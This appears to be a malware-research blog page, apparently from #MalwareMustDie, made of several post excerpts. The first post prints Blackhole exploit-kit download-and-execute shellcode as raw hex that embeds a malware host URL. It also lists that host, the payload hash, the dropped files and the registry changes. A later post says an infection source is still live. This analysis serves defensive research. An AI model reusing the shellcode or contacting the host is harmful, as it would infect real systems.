8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb 
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff
4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 
20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb 
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 
69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72 
6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f 
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff 

And your PC will be downloaded by:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

first & second download is going to be the same payload malware:

0318c42a3f.exe 059b029e9f645bafde2d603b73221f19

Which Will drop:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

Those binaries makes these rigistry key:

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

with new value:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
term= AppData
To-=C:\Documents and Settings\Administrator\Application Data <-- malware executable homebasedir

Read More

Fake Flash Updater presented by #blackhole

It is an epidemic of blackhole infection url in the wild.
Below are the analysis of the dropped malwares so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below

2. Shellcode API of kernel.dll and urmon.dll was used to download, save, execute and daemonize the payload trojan
, like:

3. Payload is packed by newest method to aboid packerDB detection
4. infected urls can be grepped by: ".php?f=" ".php?h=" by almost all MDL
5. This is the popular malware downloader used by current epidemic:

Read More

New Blackhole HTML Infector found

I came up with this sample today from MDL, I analyzed it and wrote report in VT with the below URL: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is a new infection injected code, kinda long, but malzilla and jsunpack break them after 3loop in tries. It was uploaded by 2012 Aug30th 11:30 in the infected server. Very new. No wonder VT has the Detection Ratio of (2/42)

It redirected you to the infected payload using the Java exploit

The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, still up/alive.

Or contact me for more details.

#MalwareMustDie!

Read More

Interesting Idea: (Pastebin) How to stop Blackhole Exploit Kit by using its vulnerability

Just found this anonymous article posted in the pastebin which explained "How to stop Blackhole Exploit Kit by using its vulnerability".

So many blackhole server came up in to serve malwares at the same time. The article is explaining the weaknesses of the security configuration of ngnix used by these blackholes by possibility exploiting its redirection features of it to perform a loop to gain DoS to its service.

Read More

#MalwareMustDie - Day1 Opening Day Report

We have a very postive response from researchers after releasing the twitter forum of #MalwareMustDie, Thank's to the reversers and analysists friends who spontaneously join & actively involve and those also who monitored the stream. it was the busiest 6hours of my life.

From appearance you may see stuffs like this:
Like you can see in the widget at the right panel of this blog..

In actual the admin panel went so crazy like this snips:
which is rolling fast for mentions & follows. Boy, we're into something!

It is a good start indeed let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great and let's stay in touch. Because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today cracking & yelling crazy in chaos.

That's the spirit boys! And we really think #MalwareMUSTdie!!

Read More

Info: Ammyy now warning about telephony scams

I am happy to report, Ammyy, the remote software firm, are now warning about the on-going telephony scams.

When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that

Read More

Email issues

Seems to be one thing or another lately, but there appears to be an issue with the mailbox for it-mate.co.uk, housed by Domain Monster. This issue is of an unknown cause at present, and because Domain Monster both don't work 24/7, and are unreachable on Sundays, won't be identified until Monday (assuming it doesn't resolve itself before then).

Suffice to say, the issue present prevents my

Read More